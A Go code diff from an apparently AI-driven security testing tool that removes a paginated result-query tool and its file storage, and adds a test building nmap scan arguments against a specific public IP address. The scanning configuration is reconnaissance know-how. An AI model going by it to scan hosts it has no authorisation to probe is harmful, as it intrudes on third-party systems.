func (e *Executor) buildToolIndex() { func (e *Executor) buildToolIndex() {
e.toolIndex = make(map[string]*config.ToolConfig) e.toolIndex = make(map[string]*config.ToolConfig)
@@ -1245,238 +1225,22 @@ func runCommandWithPTY(ctx context.Context, cmd *exec.Cmd, cb ToolOutputCallback
// executeInternalTool 执行内部工具(不执行外部命令) // executeInternalTool 执行内部工具(不执行外部命令)
func (e *Executor) executeInternalTool(ctx context.Context, toolName string, command string, args map[string]interface{}) (*mcp.ToolResult, error) { func (e *Executor) executeInternalTool(ctx context.Context, toolName string, command string, args map[string]interface{}) (*mcp.ToolResult, error) {
// 提取内部工具类型(去掉 "internal:" 前缀)
internalToolType := strings.TrimPrefix(command, "internal:") internalToolType := strings.TrimPrefix(command, "internal:")
e.logger.Warn("未知的内部工具",
e.logger.Info("执行内部工具",
zap.String("toolName", toolName), zap.String("toolName", toolName),
zap.String("internalToolType", internalToolType), zap.String("internalToolType", internalToolType),
zap.Any("args", args),
) )
// 根据内部工具类型分发处理
switch internalToolType {
case "query_execution_result":
return e.executeQueryExecutionResult(ctx, args)
default:
return &mcp.ToolResult{
Content: []mcp.Content{
{
Type: "text",
Text: fmt.Sprintf("错误: 未知的内部工具类型: %s", internalToolType),
},
},
IsError: true,
}, nil
}
}
// executeQueryExecutionResult 执行查询执行结果工具
func (e *Executor) executeQueryExecutionResult(ctx context.Context, args map[string]interface{}) (*mcp.ToolResult, error) {
// 获取 execution_id 参数
executionID, ok := args["execution_id"].(string)
if !ok || executionID == "" {
return &mcp.ToolResult{
Content: []mcp.Content{
{
Type: "text",
Text: "错误: execution_id 参数必需且不能为空",
},
},
IsError: true,
}, nil
}
// 获取可选参数
page := 1
if p, ok := args["page"].(float64); ok {
page = int(p)
}
if page < 1 {
page = 1
}
limit := 100
if l, ok := args["limit"].(float64); ok {
limit = int(l)
}
if limit < 1 {
limit = 100
}
if limit > 500 {
limit = 500 // 限制最大每页行数
}
search := ""
if s, ok := args["search"].(string); ok {
search = s
}
filter := ""
if f, ok := args["filter"].(string); ok {
filter = f
}
useRegex := false
if r, ok := args["use_regex"].(bool); ok {
useRegex = r
}
// 检查结果存储是否可用
if e.resultStorage == nil {
return &mcp.ToolResult{
Content: []mcp.Content{
{
Type: "text",
Text: "错误: 结果存储未初始化",
},
},
IsError: true,
}, nil
}
// 执行查询
var resultPage *storage.ResultPage
var err error
if search != "" {
// 搜索模式
matchedLines, err := e.resultStorage.SearchResult(executionID, search, useRegex)
if err != nil {
return &mcp.ToolResult{
Content: []mcp.Content{
{
Type: "text",
Text: fmt.Sprintf("搜索失败: %v", err),
},
},
IsError: true,
}, nil
}
// 对搜索结果进行分页
resultPage = paginateLines(matchedLines, page, limit)
} else if filter != "" {
// 过滤模式
filteredLines, err := e.resultStorage.FilterResult(executionID, filter, useRegex)
if err != nil {
return &mcp.ToolResult{
Content: []mcp.Content{
{
Type: "text",
Text: fmt.Sprintf("过滤失败: %v", err),
},
},
IsError: true,
}, nil
}
// 对过滤结果进行分页
resultPage = paginateLines(filteredLines, page, limit)
} else {
// 普通分页查询
resultPage, err = e.resultStorage.GetResultPage(executionID, page, limit)
if err != nil {
return &mcp.ToolResult{
Content: []mcp.Content{
{
Type: "text",
Text: fmt.Sprintf("查询失败: %v", err),
},
},
IsError: true,
}, nil
}
}
// 获取元信息
metadata, err := e.resultStorage.GetResultMetadata(executionID)
if err != nil {
// 元信息获取失败不影响查询结果
e.logger.Warn("获取结果元信息失败", zap.Error(err))
}
// 格式化返回结果
var sb strings.Builder
sb.WriteString(fmt.Sprintf("查询结果 (执行ID: %s)\n", executionID))
if metadata != nil {
sb.WriteString(fmt.Sprintf("工具: %s | 大小: %d 字节 (%.2f KB) | 总行数: %d\n",
metadata.ToolName, metadata.TotalSize, float64(metadata.TotalSize)/1024, metadata.TotalLines))
}
sb.WriteString(fmt.Sprintf("第 %d/%d 页,每页 %d 行,共 %d 行\n\n",
resultPage.Page, resultPage.TotalPages, resultPage.Limit, resultPage.TotalLines))
if len(resultPage.Lines) == 0 {
sb.WriteString("没有找到匹配的结果。\n")
} else {
for i, line := range resultPage.Lines {
lineNum := (resultPage.Page-1)*resultPage.Limit + i + 1
sb.WriteString(fmt.Sprintf("%d: %s\n", lineNum, line))
}
}
sb.WriteString("\n")
if resultPage.Page < resultPage.TotalPages {
sb.WriteString(fmt.Sprintf("提示: 使用 page=%d 查看下一页", resultPage.Page+1))
if search != "" {
sb.WriteString(fmt.Sprintf(",或使用 search=\"%s\" 继续搜索", search))
if useRegex {
sb.WriteString(" (正则模式)")
}
}
if filter != "" {
sb.WriteString(fmt.Sprintf(",或使用 filter=\"%s\" 继续过滤", filter))
if useRegex {
sb.WriteString(" (正则模式)")
}
}
sb.WriteString("\n")
}
return &mcp.ToolResult{ return &mcp.ToolResult{
Content: []mcp.Content{ Content: []mcp.Content{
{ {
Type: "text", Type: "text",
Text: sb.String(), Text: fmt.Sprintf("错误: 未知的内部工具类型: %s", internalToolType),
}, },
}, },
IsError: false, IsError: true,
}, nil }, nil
} }
// paginateLines 对行列表进行分页
func paginateLines(lines []string, page int, limit int) *storage.ResultPage {
totalLines := len(lines)
totalPages := (totalLines + limit - 1) / limit
if page < 1 {
page = 1
}
if page > totalPages && totalPages > 0 {
page = totalPages
}
start := (page - 1) * limit
end := start + limit
if end > totalLines {
end = totalLines
}
var pageLines []string
if start < totalLines {
pageLines = lines[start:end]
} else {
pageLines = []string{}
}
return &storage.ResultPage{
Lines: pageLines,
Page: page,
Limit: limit,
TotalLines: totalLines,
TotalPages: totalPages,
}
}
// buildInputSchema 构建输入模式 // buildInputSchema 构建输入模式
func (e *Executor) buildInputSchema(toolConfig *config.ToolConfig) map[string]interface{} { func (e *Executor) buildInputSchema(toolConfig *config.ToolConfig) map[string]interface{} {
schema := map[string]interface{}{ schema := map[string]interface{}{
+46 -208
View File
@@ -2,15 +2,12 @@ package security
import ( import (
"context" "context"
"os"
"path/filepath"
"strings" "strings"
"testing" "testing"
"time" "time"
"cyberstrike-ai/internal/config" "cyberstrike-ai/internal/config"
"cyberstrike-ai/internal/mcp" "cyberstrike-ai/internal/mcp"
"cyberstrike-ai/internal/storage"
"go.uber.org/zap" "go.uber.org/zap"
) )
@@ -28,137 +25,6 @@ func setupTestExecutor(t *testing.T) (*Executor, *mcp.Server) {
return executor, mcpServer return executor, mcpServer
} }
// setupTestStorage 创建测试用的存储
func setupTestStorage(t *testing.T) *storage.FileResultStorage {
tmpDir := filepath.Join(os.TempDir(), "test_executor_storage_"+time.Now().Format("20060102_150405"))
logger := zap.NewNop()
storage, err := storage.NewFileResultStorage(tmpDir, logger)
if err != nil {
t.Fatalf("创建测试存储失败: %v", err)
}
return storage
}
func TestExecutor_ExecuteInternalTool_QueryExecutionResult(t *testing.T) {
executor, _ := setupTestExecutor(t)
testStorage := setupTestStorage(t)
executor.SetResultStorage(testStorage)
// 准备测试数据
executionID := "test_exec_001"
toolName := "nmap_scan"
result := "Line 1: Port 22 open\nLine 2: Port 80 open\nLine 3: Port 443 open\nLine 4: error occurred"
// 保存测试结果
err := testStorage.SaveResult(executionID, toolName, result)
if err != nil {
t.Fatalf("保存测试结果失败: %v", err)
}
ctx := context.Background()
// 测试1: 基本查询(第一页)
args := map[string]interface{}{
"execution_id": executionID,
"page": float64(1),
"limit": float64(2),
}
toolResult, err := executor.executeQueryExecutionResult(ctx, args)
if err != nil {
t.Fatalf("执行查询失败: %v", err)
}
if toolResult.IsError {
t.Fatalf("查询应该成功,但返回了错误: %s", toolResult.Content[0].Text)
}
// 验证结果包含预期内容
resultText := toolResult.Content[0].Text
if !strings.Contains(resultText, executionID) {
t.Errorf("结果中应该包含执行ID: %s", executionID)
}
if !strings.Contains(resultText, "第 1/") {
t.Errorf("结果中应该包含分页信息")
}
// 测试2: 搜索功能
args2 := map[string]interface{}{
"execution_id": executionID,
"search": "error",
"page": float64(1),
"limit": float64(10),
}
toolResult2, err := executor.executeQueryExecutionResult(ctx, args2)
if err != nil {
t.Fatalf("执行搜索失败: %v", err)
}
if toolResult2.IsError {
t.Fatalf("搜索应该成功,但返回了错误: %s", toolResult2.Content[0].Text)
}
resultText2 := toolResult2.Content[0].Text
if !strings.Contains(resultText2, "error") {
t.Errorf("搜索结果中应该包含关键词: error")
}
// 测试3: 过滤功能
args3 := map[string]interface{}{
"execution_id": executionID,
"filter": "Port",
"page": float64(1),
"limit": float64(10),
}
toolResult3, err := executor.executeQueryExecutionResult(ctx, args3)
if err != nil {
t.Fatalf("执行过滤失败: %v", err)
}
if toolResult3.IsError {
t.Fatalf("过滤应该成功,但返回了错误: %s", toolResult3.Content[0].Text)
}
resultText3 := toolResult3.Content[0].Text
if !strings.Contains(resultText3, "Port") {
t.Errorf("过滤结果中应该包含关键词: Port")
}
// 测试4: 缺少必需参数
args4 := map[string]interface{}{
"page": float64(1),
}
toolResult4, err := executor.executeQueryExecutionResult(ctx, args4)
if err != nil {
t.Fatalf("执行查询失败: %v", err)
}
if !toolResult4.IsError {
t.Fatal("缺少execution_id应该返回错误")
}
// 测试5: 不存在的执行ID
args5 := map[string]interface{}{
"execution_id": "nonexistent_id",
"page": float64(1),
}
toolResult5, err := executor.executeQueryExecutionResult(ctx, args5)
if err != nil {
t.Fatalf("执行查询失败: %v", err)
}
if !toolResult5.IsError {
t.Fatal("不存在的执行ID应该返回错误")
}
}
func TestExecutor_ExecuteInternalTool_UnknownTool(t *testing.T) { func TestExecutor_ExecuteInternalTool_UnknownTool(t *testing.T) {
executor, _ := setupTestExecutor(t) executor, _ := setupTestExecutor(t)
@@ -182,29 +48,6 @@ func TestExecutor_ExecuteInternalTool_UnknownTool(t *testing.T) {
} }
} }
func TestExecutor_ExecuteInternalTool_NoStorage(t *testing.T) {
executor, _ := setupTestExecutor(t)
// 不设置存储,测试未初始化的情况
ctx := context.Background()
args := map[string]interface{}{
"execution_id": "test_id",
}
toolResult, err := executor.executeQueryExecutionResult(ctx, args)
if err != nil {
t.Fatalf("执行查询失败: %v", err)
}
if !toolResult.IsError {
t.Fatal("未初始化的存储应该返回错误")
}
if !strings.Contains(toolResult.Content[0].Text, "结果存储未初始化") {
t.Errorf("错误消息应该包含'结果存储未初始化'")
}
}
func TestExecuteSystemCommand_BackgroundDoesNotBlockOnChildStdout(t *testing.T) { func TestExecuteSystemCommand_BackgroundDoesNotBlockOnChildStdout(t *testing.T) {
executor, _ := setupTestExecutor(t) executor, _ := setupTestExecutor(t)
// 子进程先向 stdout 写无换行字符再长时间 sleep;若与 echo $pid 共享管道且未重定向子进程 stdout, // 子进程先向 stdout 写无换行字符再长时间 sleep;若与 echo $pid 共享管道且未重定向子进程 stdout,
@@ -228,63 +71,58 @@ func TestExecuteSystemCommand_BackgroundDoesNotBlockOnChildStdout(t *testing.T)
} }
} }
func TestPaginateLines(t *testing.T) { func TestBuildCommandArgs_NmapSkipsEmptyOptionalFlags(t *testing.T) {
lines := []string{"Line 1", "Line 2", "Line 3", "Line 4", "Line 5"} pos1 := 1
executor, _ := setupTestExecutor(t)
// 测试第一页 toolConfig := &config.ToolConfig{
page := paginateLines(lines, 1, 2) Name: "nmap",
if page.Page != 1 { Command: "nmap",
t.Errorf("页码不匹配。期望: 1, 实际: %d", page.Page) Args: []string{"-sT", "-sV", "-sC"},
} Parameters: []config.ParameterConfig{
if page.Limit != 2 { {Name: "target", Type: "string", Required: true, Position: &pos1, Format: "positional"},
t.Errorf("每页行数不匹配。期望: 2, 实际: %d", page.Limit) {Name: "ports", Type: "string", Flag: "-p", Format: "flag"},
} {Name: "timing", Type: "string", Template: "-T{value}", Format: "template"},
if page.TotalLines != 5 { {Name: "nse_scripts", Type: "string", Flag: "--script", Format: "flag"},
t.Errorf("总行数不匹配。期望: 5, 实际: %d", page.TotalLines) {Name: "os_detection", Type: "bool", Flag: "-O", Format: "flag", Default: false},
} {Name: "aggressive", Type: "bool", Flag: "-A", Format: "flag", Default: false},
if page.TotalPages != 3 { {Name: "scan_type", Type: "string", Format: "template", Template: "{value}"},
t.Errorf("总页数不匹配。期望: 3, 实际: %d", page.TotalPages) {Name: "additional_args", Type: "string", Format: "positional"},
} },
if len(page.Lines) != 2 {
t.Errorf("第一页行数不匹配。期望: 2, 实际: %d", len(page.Lines))
} }
// 测试第二页 args := map[string]interface{}{
page2 := paginateLines(lines, 2, 2) "target": "110.52.223.114",
if len(page2.Lines) != 2 { "ports": "21, 22, 80, 443",
t.Errorf("第二页行数不匹配。期望: 2, 实际: %d", len(page2.Lines)) "timing": "4",
} "nse_scripts": "",
if page2.Lines[0] != "Line 3" { "scan_type": "",
t.Errorf("第二页第一行不匹配。期望: Line 3, 实际: %s", page2.Lines[0]) "os_detection": false,
"aggressive": false,
"additional_args": "-Pn",
} }
// 测试最后一页 cmdArgs := executor.buildCommandArgs("nmap", toolConfig, args)
page3 := paginateLines(lines, 3, 2) joined := strings.Join(cmdArgs, " ")
if len(page3.Lines) != 1 {
t.Errorf("第三页行数不匹配。期望: 1, 实际: %d", len(page3.Lines))
}
// 测试超出范围的页码(应该返回最后一页) if strings.Contains(joined, "--script") {
page4 := paginateLines(lines, 4, 2) t.Fatalf("empty nse_scripts must not emit --script, got: %v", cmdArgs)
if page4.Page != 3 {
t.Errorf("超出范围的页码应该被修正为最后一页。期望: 3, 实际: %d", page4.Page)
} }
if len(page4.Lines) != 1 { if !strings.Contains(joined, "110.52.223.114") {
t.Errorf("最后一页应该只有1行。实际: %d行", len(page4.Lines)) t.Fatalf("target missing from args: %v", cmdArgs)
} }
// target 应出现在 -Pn 之前,避免被误当作 --script 的参数
// 测试无效页码(小于1 pnIdx := indexOf(cmdArgs, "-Pn")
page0 := paginateLines(lines, 0, 2) targetIdx := indexOf(cmdArgs, "110.52.223.114")
if page0.Page != 1 { if pnIdx < 0 || targetIdx < 0 || targetIdx >= pnIdx {
t.Errorf("无效页码应该被修正为1。实际: %d", page0.Page) t.Fatalf("expected target before -Pn, got: %v", cmdArgs)
}
// 测试空列表
emptyPage := paginateLines([]string{}, 1, 10)
if emptyPage.TotalLines != 0 {
t.Errorf("空列表的总行数应该为0。实际: %d", emptyPage.TotalLines)
}
if len(emptyPage.Lines) != 0 {
t.Errorf("空列表应该返回空结果。实际: %d行", len(emptyPage.Lines))
} }
} }
func indexOf(slice []string, s string) int {
for i, v := range slice {
if v == s {
return i
}
}
return -1
}
-297
View File
@@ -1,297 +0,0 @@
package storage
import (
"encoding/json"
"fmt"
"os"
"path/filepath"
"regexp"
"strings"
"sync"
"time"
"go.uber.org/zap"
)
// ResultStorage 结果存储接口
type ResultStorage interface {
// SaveResult 保存工具执行结果
SaveResult(executionID string, toolName string, result string) error
// GetResult 获取完整结果
GetResult(executionID string) (string, error)
// GetResultPage 分页获取结果
GetResultPage(executionID string, page int, limit int) (*ResultPage, error)
// SearchResult 搜索结果
// useRegex: 如果为 true,将 keyword 作为正则表达式使用;如果为 false,使用简单的字符串包含匹配
SearchResult(executionID string, keyword string, useRegex bool) ([]string, error)
// FilterResult 过滤结果
// useRegex: 如果为 true,将 filter 作为正则表达式使用;如果为 false,使用简单的字符串包含匹配
FilterResult(executionID string, filter string, useRegex bool) ([]string, error)
// GetResultMetadata 获取结果元信息
GetResultMetadata(executionID string) (*ResultMetadata, error)
// GetResultPath 获取结果文件路径
GetResultPath(executionID string) string
// DeleteResult 删除结果
DeleteResult(executionID string) error
}
// ResultPage 分页结果
type ResultPage struct {
Lines []string `json:"lines"`
Page int `json:"page"`
Limit int `json:"limit"`
TotalLines int `json:"total_lines"`
TotalPages int `json:"total_pages"`
}
// ResultMetadata 结果元信息
type ResultMetadata struct {
ExecutionID string `json:"execution_id"`
ToolName string `json:"tool_name"`
TotalSize int `json:"total_size"`
TotalLines int `json:"total_lines"`
CreatedAt time.Time `json:"created_at"`
}
// FileResultStorage 基于文件的结果存储实现
type FileResultStorage struct {
baseDir string
logger *zap.Logger
mu sync.RWMutex
}
// NewFileResultStorage 创建新的文件结果存储
func NewFileResultStorage(baseDir string, logger *zap.Logger) (*FileResultStorage, error) {
// 确保目录存在
if err := os.MkdirAll(baseDir, 0755); err != nil {
return nil, fmt.Errorf("创建存储目录失败: %w", err)
}
return &FileResultStorage{
baseDir: baseDir,
logger: logger,
}, nil
}
// getResultPath 获取结果文件路径
func (s *FileResultStorage) getResultPath(executionID string) string {
return filepath.Join(s.baseDir, executionID+".txt")
}
// getMetadataPath 获取元数据文件路径
func (s *FileResultStorage) getMetadataPath(executionID string) string {
return filepath.Join(s.baseDir, executionID+".meta.json")
}
// SaveResult 保存工具执行结果
func (s *FileResultStorage) SaveResult(executionID string, toolName string, result string) error {
s.mu.Lock()
defer s.mu.Unlock()
// 保存结果文件
resultPath := s.getResultPath(executionID)
if err := os.WriteFile(resultPath, []byte(result), 0644); err != nil {
return fmt.Errorf("保存结果文件失败: %w", err)
}
// 计算统计信息
lines := strings.Split(result, "\n")
metadata := &ResultMetadata{
ExecutionID: executionID,
ToolName: toolName,
TotalSize: len(result),
TotalLines: len(lines),
CreatedAt: time.Now(),
}
// 保存元数据
metadataPath := s.getMetadataPath(executionID)
metadataJSON, err := json.Marshal(metadata)
if err != nil {
return fmt.Errorf("序列化元数据失败: %w", err)
}
if err := os.WriteFile(metadataPath, metadataJSON, 0644); err != nil {
return fmt.Errorf("保存元数据文件失败: %w", err)
}
s.logger.Info("保存工具执行结果",
zap.String("executionID", executionID),
zap.String("toolName", toolName),
zap.Int("size", len(result)),
zap.Int("lines", len(lines)),
)
return nil
}
// GetResult 获取完整结果
func (s *FileResultStorage) GetResult(executionID string) (string, error) {
s.mu.RLock()
defer s.mu.RUnlock()
resultPath := s.getResultPath(executionID)
data, err := os.ReadFile(resultPath)
if err != nil {
if os.IsNotExist(err) {
return "", fmt.Errorf("结果不存在: %s", executionID)
}
return "", fmt.Errorf("读取结果文件失败: %w", err)
}
return string(data), nil
}
// GetResultMetadata 获取结果元信息
func (s *FileResultStorage) GetResultMetadata(executionID string) (*ResultMetadata, error) {
s.mu.RLock()
defer s.mu.RUnlock()
metadataPath := s.getMetadataPath(executionID)
data, err := os.ReadFile(metadataPath)
if err != nil {
if os.IsNotExist(err) {
return nil, fmt.Errorf("结果不存在: %s", executionID)
}
return nil, fmt.Errorf("读取元数据文件失败: %w", err)
}
var metadata ResultMetadata
if err := json.Unmarshal(data, &metadata); err != nil {
return nil, fmt.Errorf("解析元数据失败: %w", err)
}
return &metadata, nil
}
// GetResultPage 分页获取结果
func (s *FileResultStorage) GetResultPage(executionID string, page int, limit int) (*ResultPage, error) {
s.mu.RLock()
defer s.mu.RUnlock()
// 获取完整结果
result, err := s.GetResult(executionID)
if err != nil {
return nil, err
}
// 分割为行
lines := strings.Split(result, "\n")
totalLines := len(lines)
// 计算分页
totalPages := (totalLines + limit - 1) / limit
if page < 1 {
page = 1
}
if page > totalPages && totalPages > 0 {
page = totalPages
}
// 计算起始和结束索引
start := (page - 1) * limit
end := start + limit
if end > totalLines {
end = totalLines
}
// 提取指定页的行
var pageLines []string
if start < totalLines {
pageLines = lines[start:end]
} else {
pageLines = []string{}
}
return &ResultPage{
Lines: pageLines,
Page: page,
Limit: limit,
TotalLines: totalLines,
TotalPages: totalPages,
}, nil
}
// SearchResult 搜索结果
func (s *FileResultStorage) SearchResult(executionID string, keyword string, useRegex bool) ([]string, error) {
s.mu.RLock()
defer s.mu.RUnlock()
// 获取完整结果
result, err := s.GetResult(executionID)
if err != nil {
return nil, err
}
// 如果使用正则表达式,先编译正则
var regex *regexp.Regexp
if useRegex {
compiledRegex, err := regexp.Compile(keyword)
if err != nil {
return nil, fmt.Errorf("无效的正则表达式: %w", err)
}
regex = compiledRegex
}
// 分割为行并搜索
lines := strings.Split(result, "\n")
var matchedLines []string
for _, line := range lines {
var matched bool
if useRegex {
matched = regex.MatchString(line)
} else {
matched = strings.Contains(line, keyword)
}
if matched {
matchedLines = append(matchedLines, line)
}
}
return matchedLines, nil
}
// FilterResult 过滤结果
func (s *FileResultStorage) FilterResult(executionID string, filter string, useRegex bool) ([]string, error) {
// 过滤和搜索逻辑相同,都是查找包含关键词的行
return s.SearchResult(executionID, filter, useRegex)
}
// GetResultPath 获取结果文件路径
func (s *FileResultStorage) GetResultPath(executionID string) string {
return s.getResultPath(executionID)
}
// DeleteResult 删除结果
func (s *FileResultStorage) DeleteResult(executionID string) error {
s.mu.Lock()
defer s.mu.Unlock()
resultPath := s.getResultPath(executionID)
metadataPath := s.getMetadataPath(executionID)
// 删除结果文件
if err := os.Remove(resultPath); err != nil && !os.IsNotExist(err) {
return fmt.Errorf("删除结果文件失败: %w", err)
}
// 删除元数据文件
if err := os.Remove(metadataPath); err != nil && !os.IsNotExist(err) {
return fmt.Errorf("删除元数据文件失败: %w", err)
}
s.logger.Info("删除工具执行结果",
zap.String("executionID", executionID),
)
return nil
}
-453
View File
@@ -1,453 +0,0 @@
package storage
import (
"fmt"
"os"
"path/filepath"
"strings"
"testing"
"time"
"go.uber.org/zap"
)
// setupTestStorage 创建测试用的存储实例
func setupTestStorage(t *testing.T) (*FileResultStorage, string) {
tmpDir := filepath.Join(os.TempDir(), "test_result_storage_"+time.Now().Format("20060102_150405"))
logger := zap.NewNop()
storage, err := NewFileResultStorage(tmpDir, logger)
if err != nil {
t.Fatalf("创建测试存储失败: %v", err)
}
return storage, tmpDir
}
// cleanupTestStorage 清理测试数据
func cleanupTestStorage(t *testing.T, tmpDir string) {
if err := os.RemoveAll(tmpDir); err != nil {
t.Logf("清理测试目录失败: %v", err)
}
}
func TestNewFileResultStorage(t *testing.T) {
tmpDir := filepath.Join(os.TempDir(), "test_new_storage_"+time.Now().Format("20060102_150405"))
defer cleanupTestStorage(t, tmpDir)
logger := zap.NewNop()
storage, err := NewFileResultStorage(tmpDir, logger)
if err != nil {
t.Fatalf("创建存储失败: %v", err)
}
if storage == nil {
t.Fatal("存储实例为nil")
}
// 验证目录已创建
if _, err := os.Stat(tmpDir); os.IsNotExist(err) {
t.Fatal("存储目录未创建")
}
}
func TestFileResultStorage_SaveResult(t *testing.T) {
storage, tmpDir := setupTestStorage(t)
defer cleanupTestStorage(t, tmpDir)
executionID := "test_exec_001"
toolName := "nmap_scan"
result := "Line 1\nLine 2\nLine 3\nLine 4\nLine 5"
err := storage.SaveResult(executionID, toolName, result)
if err != nil {
t.Fatalf("保存结果失败: %v", err)
}
// 验证结果文件存在
resultPath := filepath.Join(tmpDir, executionID+".txt")
if _, err := os.Stat(resultPath); os.IsNotExist(err) {
t.Fatal("结果文件未创建")
}
// 验证元数据文件存在
metadataPath := filepath.Join(tmpDir, executionID+".meta.json")
if _, err := os.Stat(metadataPath); os.IsNotExist(err) {
t.Fatal("元数据文件未创建")
}
}
func TestFileResultStorage_GetResult(t *testing.T) {
storage, tmpDir := setupTestStorage(t)
defer cleanupTestStorage(t, tmpDir)
executionID := "test_exec_002"
toolName := "test_tool"
expectedResult := "Test result content\nLine 2\nLine 3"
// 先保存结果
err := storage.SaveResult(executionID, toolName, expectedResult)
if err != nil {
t.Fatalf("保存结果失败: %v", err)
}
// 获取结果
result, err := storage.GetResult(executionID)
if err != nil {
t.Fatalf("获取结果失败: %v", err)
}
if result != expectedResult {
t.Errorf("结果不匹配。期望: %q, 实际: %q", expectedResult, result)
}
// 测试不存在的执行ID
_, err = storage.GetResult("nonexistent_id")
if err == nil {
t.Fatal("应该返回错误")
}
}
func TestFileResultStorage_GetResultMetadata(t *testing.T) {
storage, tmpDir := setupTestStorage(t)
defer cleanupTestStorage(t, tmpDir)
executionID := "test_exec_003"
toolName := "test_tool"
result := "Line 1\nLine 2\nLine 3"
// 保存结果
err := storage.SaveResult(executionID, toolName, result)
if err != nil {
t.Fatalf("保存结果失败: %v", err)
}
// 获取元数据
metadata, err := storage.GetResultMetadata(executionID)
if err != nil {
t.Fatalf("获取元数据失败: %v", err)
}
if metadata.ExecutionID != executionID {
t.Errorf("执行ID不匹配。期望: %s, 实际: %s", executionID, metadata.ExecutionID)
}
if metadata.ToolName != toolName {
t.Errorf("工具名称不匹配。期望: %s, 实际: %s", toolName, metadata.ToolName)
}
if metadata.TotalSize != len(result) {
t.Errorf("总大小不匹配。期望: %d, 实际: %d", len(result), metadata.TotalSize)
}
expectedLines := len(strings.Split(result, "\n"))
if metadata.TotalLines != expectedLines {
t.Errorf("总行数不匹配。期望: %d, 实际: %d", expectedLines, metadata.TotalLines)
}
// 验证创建时间在合理范围内
now := time.Now()
if metadata.CreatedAt.After(now) || metadata.CreatedAt.Before(now.Add(-time.Second)) {
t.Errorf("创建时间不在合理范围内: %v", metadata.CreatedAt)
}
}
func TestFileResultStorage_GetResultPage(t *testing.T) {
storage, tmpDir := setupTestStorage(t)
defer cleanupTestStorage(t, tmpDir)
executionID := "test_exec_004"
toolName := "test_tool"
// 创建包含10行的结果
lines := make([]string, 10)
for i := 0; i < 10; i++ {
lines[i] = fmt.Sprintf("Line %d", i+1)
}
result := strings.Join(lines, "\n")
// 保存结果
err := storage.SaveResult(executionID, toolName, result)
if err != nil {
t.Fatalf("保存结果失败: %v", err)
}
// 测试第一页(每页3行)
page, err := storage.GetResultPage(executionID, 1, 3)
if err != nil {
t.Fatalf("获取第一页失败: %v", err)
}
if page.Page != 1 {
t.Errorf("页码不匹配。期望: 1, 实际: %d", page.Page)
}
if page.Limit != 3 {
t.Errorf("每页行数不匹配。期望: 3, 实际: %d", page.Limit)
}
if page.TotalLines != 10 {
t.Errorf("总行数不匹配。期望: 10, 实际: %d", page.TotalLines)
}
if page.TotalPages != 4 {
t.Errorf("总页数不匹配。期望: 4, 实际: %d", page.TotalPages)
}
if len(page.Lines) != 3 {
t.Errorf("第一页行数不匹配。期望: 3, 实际: %d", len(page.Lines))
}
if page.Lines[0] != "Line 1" {
t.Errorf("第一行内容不匹配。期望: Line 1, 实际: %s", page.Lines[0])
}
// 测试第二页
page2, err := storage.GetResultPage(executionID, 2, 3)
if err != nil {
t.Fatalf("获取第二页失败: %v", err)
}
if len(page2.Lines) != 3 {
t.Errorf("第二页行数不匹配。期望: 3, 实际: %d", len(page2.Lines))
}
if page2.Lines[0] != "Line 4" {
t.Errorf("第二页第一行内容不匹配。期望: Line 4, 实际: %s", page2.Lines[0])
}
// 测试最后一页(可能不满一页)
page4, err := storage.GetResultPage(executionID, 4, 3)
if err != nil {
t.Fatalf("获取第四页失败: %v", err)
}
if len(page4.Lines) != 1 {
t.Errorf("第四页行数不匹配。期望: 1, 实际: %d", len(page4.Lines))
}
// 测试超出范围的页码(应该返回最后一页)
page5, err := storage.GetResultPage(executionID, 5, 3)
if err != nil {
t.Fatalf("获取第五页失败: %v", err)
}
// 超出范围的页码会被修正为最后一页,所以应该返回最后一页的内容
if page5.Page != 4 {
t.Errorf("超出范围的页码应该被修正为最后一页。期望: 4, 实际: %d", page5.Page)
}
// 最后一页应该只有1行
if len(page5.Lines) != 1 {
t.Errorf("最后一页应该只有1行。实际: %d行", len(page5.Lines))
}
}
func TestFileResultStorage_SearchResult(t *testing.T) {
storage, tmpDir := setupTestStorage(t)
defer cleanupTestStorage(t, tmpDir)
executionID := "test_exec_005"
toolName := "test_tool"
result := "Line 1: error occurred\nLine 2: success\nLine 3: error again\nLine 4: ok"
// 保存结果
err := storage.SaveResult(executionID, toolName, result)
if err != nil {
t.Fatalf("保存结果失败: %v", err)
}
// 搜索包含"error"的行(简单字符串匹配)
matchedLines, err := storage.SearchResult(executionID, "error", false)
if err != nil {
t.Fatalf("搜索失败: %v", err)
}
if len(matchedLines) != 2 {
t.Errorf("搜索结果数量不匹配。期望: 2, 实际: %d", len(matchedLines))
}
// 验证搜索结果内容
for i, line := range matchedLines {
if !strings.Contains(line, "error") {
t.Errorf("搜索结果第%d行不包含关键词: %s", i+1, line)
}
}
// 测试搜索不存在的关键词
noMatch, err := storage.SearchResult(executionID, "nonexistent", false)
if err != nil {
t.Fatalf("搜索失败: %v", err)
}
if len(noMatch) != 0 {
t.Errorf("搜索不存在的关键词应该返回空结果。实际: %d行", len(noMatch))
}
// 测试正则表达式搜索
regexMatched, err := storage.SearchResult(executionID, "error.*again", true)
if err != nil {
t.Fatalf("正则搜索失败: %v", err)
}
if len(regexMatched) != 1 {
t.Errorf("正则搜索结果数量不匹配。期望: 1, 实际: %d", len(regexMatched))
}
}
func TestFileResultStorage_FilterResult(t *testing.T) {
storage, tmpDir := setupTestStorage(t)
defer cleanupTestStorage(t, tmpDir)
executionID := "test_exec_006"
toolName := "test_tool"
result := "Line 1: warning message\nLine 2: info message\nLine 3: warning again\nLine 4: debug message"
// 保存结果
err := storage.SaveResult(executionID, toolName, result)
if err != nil {
t.Fatalf("保存结果失败: %v", err)
}
// 过滤包含"warning"的行(简单字符串匹配)
filteredLines, err := storage.FilterResult(executionID, "warning", false)
if err != nil {
t.Fatalf("过滤失败: %v", err)
}
if len(filteredLines) != 2 {
t.Errorf("过滤结果数量不匹配。期望: 2, 实际: %d", len(filteredLines))
}
// 验证过滤结果内容
for i, line := range filteredLines {
if !strings.Contains(line, "warning") {
t.Errorf("过滤结果第%d行不包含关键词: %s", i+1, line)
}
}
}
func TestFileResultStorage_DeleteResult(t *testing.T) {
storage, tmpDir := setupTestStorage(t)
defer cleanupTestStorage(t, tmpDir)
executionID := "test_exec_007"
toolName := "test_tool"
result := "Test result"
// 保存结果
err := storage.SaveResult(executionID, toolName, result)
if err != nil {
t.Fatalf("保存结果失败: %v", err)
}
// 验证文件存在
resultPath := filepath.Join(tmpDir, executionID+".txt")
metadataPath := filepath.Join(tmpDir, executionID+".meta.json")
if _, err := os.Stat(resultPath); os.IsNotExist(err) {
t.Fatal("结果文件不存在")
}
if _, err := os.Stat(metadataPath); os.IsNotExist(err) {
